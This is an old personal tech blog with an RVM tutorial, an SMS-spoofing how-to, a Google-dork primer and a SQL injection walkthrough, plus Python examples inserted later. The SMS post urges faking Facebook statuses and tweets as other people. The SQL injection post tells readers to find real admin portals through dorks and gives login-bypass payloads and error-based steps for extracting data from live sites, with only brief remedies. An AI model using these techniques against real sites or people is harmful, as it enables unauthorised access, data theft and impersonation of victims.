Thursday, 8 March 2012

RVM Ruby Version Manager

It was the time when I was struck with the burden of projects on different Ruby versions. I had installed Ruby 1.9.2 and Rails 3.2.1.
But thank God, RVM came to the rescue. If a project was built on Rails 2.3.8 then you can't run it on Rails 3.2.1, simply because a lot changed from 2.x to 3.x (a versioning problem).

RVM, i.e. Ruby Version Manager, manages different versions of Ruby. So if I want to run an old project I can switch to an older Ruby version, e.g. 1.8.7, and run the old project easily.

With RVM comes the gemset. A gemset is an isolated set of installed gems, i.e. exactly the gems a project needs at run time. RVM keeps separate gemsets for each Ruby version, so the gems of one project never collide with those of another.

For example, if I want to run an old Ruby project then I switch the Ruby version (my default is Ruby 1.9.2) to 1.8.7 with the following command.

"rvm use 1.8.7" # this will switch to ruby 1.8.7

If I want Ruby 1.8.7 as my default Ruby then I can issue the following command in my console.

"rvm use 1.8.7 --default"

As I said, each Ruby maintains its own gemsets. To create a gemset I issue the following command.

"rvm gemset create rails2" # remember that I have switched to ruby 1.8.7, so this gemset belongs to that ruby version only, i.e. rails2 for ruby 1.8.7

Once the gemset is created I can install gems into it, BUT first switch to that particular gemset.

"rvm gemset use rails2" # switching to gemset rails2 for ruby 1.8.7

Now you can install all the gems needed to run a Ruby on Rails project.

Remember there is also a gemset called the global gemset. Gems installed there are visible from every gemset of that Ruby version, so it is the place for tools you want everywhere (bundler, rake). If you do not select a gemset at all, gems go into that Ruby's default (unnamed) gemset, not into the global one.

You can create as many gemsets as you wish for a particular version of Ruby.

To use Ruby 1.8.7 with the gemset rails2, and make that combination the default, I issue a command like this.

"rvm use 1.8.7@rails2 --default" # I've kept this as default because I want to run an old RoR project.
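To see what that rvm use actually changed, here is an added example (not from the original post; written in Python, the language used for the examples on this page, rather than Ruby). RVM selects a ruby and gemset by pointing GEM_HOME at a directory named <ruby>@<gemset> under its gems folder and adding that ruby's @global gemset to GEM_PATH; the script parses those two variables to report the active ruby and gemset and to confirm the global gemset is visible. The sample GEM_HOME/GEM_PATH values are constructed to match what RVM exports after rvm use 1.8.7@rails2, and the patch level p370 is an assumption.

```python
"""Report the ruby and gemset selected by `rvm use`.

Added example, not from the original post. RVM does its switching by
exporting GEM_HOME as <rvm_path>/gems/<ruby>[@<gemset>] and putting that
ruby's @global gemset on GEM_PATH, so parsing those two variables shows
what is active. Sample values are constructed; the patch level p370 is
an assumption.
"""
import os
import re
from typing import Dict, List, Optional

# RVM gem directories are named "<ruby>" or "<ruby>@<gemset>"; no "@" part
# means the ruby's default (unnamed) gemset.
_GEMDIR = re.compile(r"rvm/gems/(?P<ruby>[^/@]+)(?:@(?P<gemset>[^/]+))?/?$")


def parse_gem_dir(path: str) -> Optional[Dict[str, str]]:
    """Split an RVM gem directory into its ruby and gemset names."""
    m = _GEMDIR.search(path)
    if m is None:
        return None
    return {"ruby": m.group("ruby"), "gemset": m.group("gemset") or "default"}


def active_environment(env: Dict[str, str]) -> Dict[str, object]:
    """Describe the RVM selection encoded in GEM_HOME and GEM_PATH."""
    home = parse_gem_dir(env.get("GEM_HOME", ""))
    if home is None:
        return {"managed_by_rvm": False}
    entries: List[str] = [p for p in env.get("GEM_PATH", "").split(os.pathsep) if p]
    on_path = [parse_gem_dir(p) for p in entries]
    # The @global gemset is shared by every gemset of the same ruby, which is
    # why gems installed there are visible from rails2 as well.
    global_visible = any(
        g is not None and g["ruby"] == home["ruby"] and g["gemset"] == "global"
        for g in on_path
    )
    selector = home["ruby"] + ("" if home["gemset"] == "default" else "@" + home["gemset"])
    return {
        "managed_by_rvm": True,
        "ruby": home["ruby"],
        "gemset": home["gemset"],
        "global_gemset_visible": global_visible,
        "use_command": "rvm use " + selector,
    }


# Constructed sample of what RVM exports after `rvm use 1.8.7@rails2`.
SAMPLE_ENV = {
    "GEM_HOME": "/home/dev/.rvm/gems/ruby-1.8.7-p370@rails2",
    "GEM_PATH": "/home/dev/.rvm/gems/ruby-1.8.7-p370@rails2"
                ":/home/dev/.rvm/gems/ruby-1.8.7-p370@global",
}

if __name__ == "__main__":
    print(active_environment(SAMPLE_ENV))
    print(active_environment(dict(os.environ)))  # the shell this script runs in
```

Run it inside a shell where you have done rvm use and the second line reports your real environment; if GEM_HOME does not point under an rvm/gems directory, the shell is not using RVM at all, which is the usual reason a project picks up the wrong gems.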

So RVM, Ruby Version Manager, is really a great tool for managing Ruby versions efficiently, and I encourage you all to use it. In fact it is the best method and good practice too.

Saturday, 8 October 2011

RSS (Really Simple Syndication) -- Real World Format.

Hey there, I've written a blog post on RSS - Real World Format. I hope it will get you started with RSS. Below is the link.

Click Here

Monday, 22 August 2011

Now you too can spoof SMS, learn how..

What is SMS spoofing ?

According to wikipedia.org, SMS spoofing is a relatively new technology which uses the short message service (SMS), available on most mobile phones and personal digital assistants, to set who the message appears to come from by replacing the originating mobile number (Sender ID) with alphanumeric text. Spoofing has both legitimate uses (setting the company name from which the message is being sent, setting your own mobile number, or a product name) and illegitimate uses (such as impersonating another person, company, product) .

Below I share how you too can send a spoofed SMS. (Just follow the steps.)

1) Visit the website http://www.lleida.net (screenshot in the original post).

2) Click on English, as shown in the screenshot.

3) Click on "FREE ACCOUNT" in the left menu panel.

4) Register your free account by filling in proper details. (Please provide your real mobile number and e-mail ID during registration.)

5) You will get an SMS notification on your mobile number, and the account details will be mailed to you.

6) Log in to your e-mail; you will find the username and password for your free account. Click on the WEB-VERSION link given in the same e-mail.

7) The WEB-VERSION appears as in the screenshot from the original post.

8) Log in with the username and password that were provided in your e-mail.

9) The screenshot in the original post explains the rest.

10) You get 20 credits initially, i.e. you can send 60 SMS of 144 characters.

With the help of such a service you can easily change the status of any FACEBOOK user who has registered their mobile device with Facebook. You can also post a fake tweet as any person you like on Twitter.

This post was just for learning purposes; I bear no responsibility if some mischief is done. In some countries SMS spoofing is illegal, so I request you all not to use this service in countries where it is banned.

Sunday, 31 July 2011

Google Reveals A Lot (Google-dorks)

Google's advanced search operators let you build complex queries that filter security-related information out of a large number of search results.

Used maliciously, the same queries can find websites that are exposed to numerous exploits and vulnerabilities. They can also locate private, sensitive information about others, such as credit card numbers, social security numbers and even PASSWORDS.

Below I show how you can use GOOGLE to search for particular results.
(The example queries in each section were screenshots in the original post.)


Filetype operator:

This restricts results to a particular file format: for example filetype:pdf returns only PDF documents, and filetype:xls only Excel spreadsheets.

Site operator:

This restricts the search to a particular site, i.e. site:example.com returns only pages on that domain, so it is the natural way to combine the other operators with a target you are authorised to test.

Inurl operator:

This matches the given text in the page's URL (Uniform Resource Locator), e.g. inurl:admin returns pages whose address contains "admin".

Server versioning:
Learning which server software a website runs on (also called server versioning). Below is an example.
Query for Google search:

intitle:index.of "server at"

This works because Apache's automatically generated directory listings have the title "Index of /<directory>" and end with a footer such as "Apache/2.2.x (Debian) Server at www.example.com Port 80", which names the server software and version.

Find FTP logs:

As we know, FTP client logs are often left behind on web servers in plain text, and we can search for those logs, which reveal a lot (file names, paths and the servers the files were transferred to).

Directory searching:
This way you can search for particular directories of websites, e.g. intitle:index.of followed by the name of the directory you are interested in.

Particular directory listing:
This is how you list a directory restricted to the file extensions you want: add the extension to the intitle:index.of query.
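Why the intitle:index.of "server at" query works, and how to check your own servers for the same exposure, as an added example (not from the original post; the HTML page and host names are constructed): Apache's auto-generated directory index pages carry the title Index of /<dir> and a footer of the form <server version> Server at <host> Port <n>, which is exactly the text the dork matches. build_dork() assembles a query from the operators covered above, and parse_index_listing() applies the same checks to a page fetched from one of your own hosts, pulling out the server banner and any listed files with extensions of interest.

```python
"""Recognise an exposed directory listing and read its server banner.

Added example, not from the original post. build_dork() composes a
Google query from the operators discussed (site, filetype, inurl,
intitle, quoted phrase). parse_index_listing() performs offline the
checks the dork performs in Google's index: is this an auto-generated
"Index of" page, what server banner does it leak, which files of a
given extension does it list. The sample HTML is constructed.
"""
import re
from typing import Dict, List, Optional


def build_dork(site: Optional[str] = None, filetype: Optional[str] = None,
               inurl: Optional[str] = None, intitle: Optional[str] = None,
               phrase: Optional[str] = None) -> str:
    """Compose a query from the operators covered in the post."""
    parts: List[str] = []
    if intitle:
        parts.append("intitle:" + intitle)
    if phrase:
        parts.append('"' + phrase + '"')
    if site:
        parts.append("site:" + site)
    if inurl:
        parts.append("inurl:" + inurl)
    if filetype:
        parts.append("filetype:" + filetype)
    return " ".join(parts)


# Fixed strings emitted by Apache's mod_autoindex: the title the dork
# matches with intitle:index.of and the footer it matches with "server at".
_TITLE = re.compile(r"<title>\s*Index of (?P<dir>/[^<]*)</title>", re.I)
_FOOTER = re.compile(
    r"<address>\s*(?P<server>.+?) Server at (?P<host>[^ ]+) Port (?P<port>\d+)", re.I)
# Listed entries; links starting with "?" (sort controls) or "/" (parent) are skipped.
_LINK = re.compile(r'<a href="(?P<name>[^"?/][^"]*)"', re.I)


def parse_index_listing(html: str,
                        extensions: Optional[List[str]] = None) -> Dict[str, object]:
    """Return whether html is an auto-index page, its server banner and files."""
    title = _TITLE.search(html)
    if title is None:
        return {"is_listing": False}
    footer = _FOOTER.search(html)
    names = [m.group("name") for m in _LINK.finditer(html)]
    if extensions:
        wanted = tuple("." + e.lower().lstrip(".") for e in extensions)
        names = [n for n in names if n.lower().endswith(wanted)]
    return {
        "is_listing": True,
        "directory": title.group("dir"),
        "server": footer.group("server") if footer else None,
        "host": footer.group("host") if footer else None,
        "files": names,
    }


# Constructed sample of an Apache directory listing (not a real host).
SAMPLE_HTML = """<html><head><title>Index of /backup</title></head>
<body><h1>Index of /backup</h1><pre>
<a href="?C=N;O=D">Name</a>
<a href="/">Parent Directory</a>
<a href="site-2011-07.sql">site-2011-07.sql</a>
<a href="ws_ftp.log">ws_ftp.log</a>
<a href="notes.txt">notes.txt</a>
</pre><address>Apache/2.2.16 (Debian) Server at www.example.com Port 80</address>
</body></html>"""

if __name__ == "__main__":
    print(build_dork(intitle="index.of", phrase="server at", site="example.com"))
    print(parse_index_listing(SAMPLE_HTML, extensions=["sql", "log"]))
```

For auditing your own estate, feed parse_index_listing() the body of each directory URL you serve; any result with is_listing set to True is a page Google will index just as the dork above expects, and the server field is the version banner you are handing out.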
Recommended References:

http://www.i-hacked.com/content/view/23/42/

http://www.ngohaianh.info/data/GoogleHacks.pdf

http://www.exploit-db.com/google-dorks/



Tuesday, 26 July 2011

Two of the worst practices ASP.NET developers follow (practical SQL INJECTION and REMEDY)


Web developers are under tight schedules to deliver products on time, so the security aspect of a web application is often an afterthought and usually delivered later.
Here I discuss two of the most common WORST practices of ASP.NET developers, and also the remedies to prevent them.
1. Default usernames and passwords (username: admin and password: admin) on admin login portals. (Authentication bypass, in a security analyst's terms.)
2. Lack of secure programming. (SQL injection, in a security analyst's terms.)


Now I would like to share the first part of our discussion.
I just googled by typing the following in the search bar.
".in inurl:admin_login.aspx"
".in inurl:adminlogin.asp"
".in inurl:admin/login.asp"


We can see that about a hundred thousand results are displayed in no time.
I visited one of the admin login portals (shown as a screenshot in the original post; I have not mentioned the complete URL of the website, to maintain its privacy).
Now the real magic happens: I entered the username as admin and the password as ' or '0'='0 (a "magic quote", as I call it; the textbook name is a tautology-based SQL injection payload). A snapshot of what we can then mess with was included in the original post.
A list of such payloads follows; you can enter any of them in the password field (to confuse the database):

' or '1'='1
' or 1=1--
hi' or 1=1--
'or'1=1'
' or 'x'='x
' or 0=0--
" or "x"="x
') or ('x'='x
" or 0=0--
or 0=0--
" or 1=1--
or 1=1--
' or 0=0 #
" or 0=0 #
' or a=a--
" or "a"="a
or 0=0 #
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1--
admin
password

This type of vulnerability is generally found on some college and academic websites, and I am sure no web developer will be happy if such things happen.


__________________________________________________________________
LOGIC BEHIND MAGIC QUOTES:
(Why they allow us to log in in this manner)
We learnt in our academics the concept of truth tables, i.e. the OR gate, AND gate etc. Databases evaluate the WHERE clause the same way and grant access to the secure page when it comes out true. A typical login page builds its query by pasting the form fields into a string, such as SELECT * FROM users WHERE username='admin' AND password='<input>'. With the input ' or '0'='0, the first quote closes the password literal and the rest becomes part of the condition: ... AND password='' or '0'='0'. Since '0'='0' is always true, and anything OR true is true (just as in the OR gate), the query matches a row and the page logs us in without a valid password.
___________________________________________________________________
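The bypass above reproduced offline, as an added example (not from the original post): the ASP/SQL Server target is replaced by an in-memory SQLite database with a constructed users table, but the mechanism is the same, the page concatenates the password field into the WHERE clause. The vulnerable login is shown next to the parameterised fix so the same payloads can be run against both. The "#" comment payloads in the list above are MySQL-only; "--" is what works on SQL Server and SQLite.

```python
"""Login bypass with the post's tautology payloads, beside the fix.

Added example, not from the original post. SQLite stands in for SQL
Server; the users table and credentials are constructed.
"""
import sqlite3
from typing import Optional


def make_db() -> sqlite3.Connection:
    """Constructed users table standing in for the admin-login portal's."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER, username TEXT, password TEXT, privs INTEGER)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 'S3cret!', 1)")
    return conn


def build_vulnerable_query(username: str, password: str) -> str:
    """The query an unparameterised login page sends, as described in the post."""
    return ("SELECT username FROM users WHERE username='" + username
            + "' AND password='" + password + "'")


def login_vulnerable(conn: sqlite3.Connection, username: str,
                     password: str) -> Optional[str]:
    """Concatenates user input into SQL; returns the matched username, or None."""
    row = conn.execute(build_vulnerable_query(username, password)).fetchone()
    return row[0] if row else None


def login_safe(conn: sqlite3.Connection, username: str,
               password: str) -> Optional[str]:
    """Parameterised version: input is bound as data and never parsed as SQL."""
    row = conn.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# Payloads from the post that SQLite accepts: each closes the password
# literal and appends an always-true condition, "--" comments out the rest.
# ("' or 0=0 #" is left out: "#" starts a comment only in MySQL.)
PAYLOADS = ["' or '0'='0", "' or 1=1--", "' or 'x'='x", "') or ('x'='x"]

if __name__ == "__main__":
    db = make_db()
    for p in PAYLOADS:
        try:
            vuln = login_vulnerable(db, "admin", p)
        except sqlite3.Error as err:      # a syntax error is itself a leak
            vuln = "error: " + str(err)
        print(repr(p), "vulnerable:", vuln, "safe:", login_safe(db, "admin", p))
```

Note that with "' or 'x'='x" the username does not even have to exist: the OR swallows the whole AND clause, so the database returns the first user it finds, which on most sites is the administrator.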


If any of these websites lets us upload files or malicious scripts, then all the other websites hosted on the same server are exposed as well, unless the host isolates each account properly. The process of finding the websites hosted on the same server (a reverse-IP lookup) is what is called SERVER ROOTING. Anyone can then gather important information from the various websites on that server and can also DEFACE them.

In my searching, roughly one in five of the sites returned were insecure in this way; even some government firms' websites were found to be insecure.

Below I shared some of the vulnerable links that I found (shown as screenshots in the original post), and I bear no responsibility if mischief is done by YOU; this is strictly for knowledge purposes.
In fact you can find hundreds of such sites.



Now, let's look at the second part of our discussion.
ASP websites whose URLs look like www.somewebsite.com/page.asp?id=123 are more prone to SQL INJECTION. I googled ".in .pak .uk inurl:asp?id" and found the following results (of course you can use any of the Google dorks to search; the results were a screenshot in the original post).

Below is the complete process.
STEPS:
Step 1: find something like id=7 (as shown above, using a Google dork).
Step 2: append ' (a single quote) to the end of the URL and check for a database error. (If the page loads unchanged, this crude test is inconclusive rather than proof of safety: the input may be filtered, or the injection may be blind, so also compare the responses to "and 1=1" and "and 1=2".)
Step 3: http://www.someweb.com/page.aspx?movid=123 and 1=convert(int,(select top 1 table_name from information_schema.tables)) --
Step 4: http://www.someweb.com/page.aspx?movid=123 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in('<table_name>','<table_name>'))) --
Step 5: http://www.someweb.com/page.aspx?movid=123 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='<table_name>')) --
http://www.someweb.com/page.aspx?movid=123 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='<table_name>' and column_name not in('<column_name>','<column_name>'))) --
Step 6: http://www.someweb.com/page.aspx?movid=123 and 1=convert(int,(select top 1 <column_name> from <table_name>)) --

Steps 3 to 6 work because convert(int, ...) fails on a non-numeric string and SQL Server's error message echoes the value it could not convert, so each request leaks one table name, column name or row value; the not in(...) list skips the names already seen.


How to find tables and columns in a vulnerable website?
The question is "how will you find the table name?". Well, I have a nice solution for that too.
Follow these steps to learn the structure of the tables and database. We can find the table names and column names by performing these steps.
- To do this, the attacker uses the 'having' clause of the 'select' statement in the username field, as shown above (login portals):

Username: ' having 1=1--
This provokes the following error:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/process_login.asp, line 35


- So the attacker now knows the table name and the name of the first column in the query. They can continue through the columns by introducing each field into a 'group by' clause, as follows:
Username: ' group by users.id having 1=1--
(Which produces the error…)
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/process_login.asp, line 35
- Eventually the attacker arrives at the following 'username':

Username: ' group by users.id, users.username, users.password, users.privs having 1=1--

… Which produces no error, and is functionally equivalent to:
     select * from users where username = ''

- So in this way the attacker now knows that the query references only the 'users' table and uses the columns id, username, password and privs, in that order.
Although this form of SQL injection is rarer nowadays, it still exists. (This walkthrough and the error messages above follow Chris Anley's paper "Advanced SQL Injection in SQL Server Applications".)
SNAP: (screenshot in the original post)

REMEDY:

1. Filter out characters like the single quote, double quote, slash, backslash and semicolon, and extended characters like NULL, carriage return, new line, etc., in all strings from:
          - input from users
          - parameters from the URL
          - values from cookies
   (Filtering alone is fragile, since attackers keep finding encodings that slip past the list; the reliable fix is to pass every value as a bound parameter of a prepared statement or parameterised stored procedure instead of concatenating it into the SQL text.)

2. For numeric values, convert the value to an integer before putting it into the SQL statement. (Do not rely on ISNUMERIC alone: it also accepts values such as '1e3', '$5' or '.', so cast and reject on failure instead.)

3. Change "Startup and run SQL Server" to use a low-privilege user in the SQL Server Security tab, and have the application connect with a low-privilege database login rather than sa.

4. Disable or drop the stored procedures you are not using, such as:
             master..xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask
   (On SQL Server 2005 and later xp_cmdshell is off by default and is controlled with sp_configure 'xp_cmdshell'.)
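The page.asp?id=123 case from steps 1 to 6 and remedy 2, as an added example (not from the original post; SQLite stands in for SQL Server, so the error-based convert(int, ...) message itself is not reproduced, and the movies table is constructed). It shows why an unquoted numeric parameter is injectable without any quote character, how the "and 1=(...)" shape from step 3 doubles as a yes/no oracle (which goes beyond the post's error-based variant), why int() is a stricter gate than ISNUMERIC, and how a bound parameter removes the problem.

```python
"""Injection through an unquoted numeric parameter, and the remedy.

Added example, not from the original post. SQLite stands in for SQL
Server; the movies table and the payloads are constructed.
"""
import sqlite3
from typing import List, Tuple


def make_db() -> sqlite3.Connection:
    """Constructed table: one public row and one the page should never show."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE movies (movid INTEGER, title TEXT, public INTEGER)")
    conn.executemany("INSERT INTO movies VALUES (?, ?, ?)",
                     [(123, "Public film", 1), (124, "Unreleased cut", 0)])
    return conn


def get_movie_vulnerable(conn: sqlite3.Connection, movid: str) -> List[Tuple[int, str]]:
    """The id is pasted into the SQL unquoted, exactly like page.asp?id=123."""
    sql = "SELECT movid, title FROM movies WHERE public=1 AND movid=" + movid
    return conn.execute(sql).fetchall()


def probe(conn: sqlite3.Connection, condition: str) -> bool:
    """Step 3's 'and 1=(...)' shape used as a yes/no oracle: the row comes
    back only when condition holds, so any sub-select can be tested."""
    payload = "123 and 1=(select case when " + condition + " then 1 else 0 end)"
    return len(get_movie_vulnerable(conn, payload)) == 1


def parse_id(value: str) -> int:
    """Remedy 2: accept only an integer. int() rejects anything that is not
    digits with an optional sign, unlike T-SQL ISNUMERIC, which also passes
    values such as '1e3', '$5' or '.'."""
    return int(value.strip())


def get_movie_safe(conn: sqlite3.Connection, movid: str) -> List[Tuple[int, str]]:
    """Integer check plus a bound parameter: the value can only be a number."""
    return conn.execute(
        "SELECT movid, title FROM movies WHERE public=1 AND movid=?",
        (parse_id(movid),),
    ).fetchall()


# Constructed payloads in the shape of the post's step 3.
WIDEN = "123 or public=0 --"                     # 'or' overrides the public=1 filter
TABLE_COUNT = "(select count(*) from movies)=2"  # a fact to confirm through probe()

if __name__ == "__main__":
    db = make_db()
    print(get_movie_vulnerable(db, "123"))
    print(get_movie_vulnerable(db, WIDEN))
    print(probe(db, TABLE_COUNT), probe(db, "(select count(*) from movies)=3"))
    try:
        get_movie_safe(db, WIDEN)
    except ValueError as err:
        print("rejected:", err)
```

The WIDEN payload needs no quote at all, which is why step 2's single-quote test says nothing about numeric parameters; and because get_movie_safe() refuses anything int() cannot parse before the query is built, both the widening and the probe fail at the parse step rather than reaching the database.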





Recommended References:

Protect from SQL Injection in ASP.NET

One of the earliest works on SQL injection we have encountered is the paper by Rain Forest Puppy about how he hacked PacketStorm.

Great article on gathering information from ODBC error messages:

A good summary of SQL injection on various SQL Server versions:

SensePost's article on SQL injection:
http://www.sensepost.com/misc/SQLinsertion.htm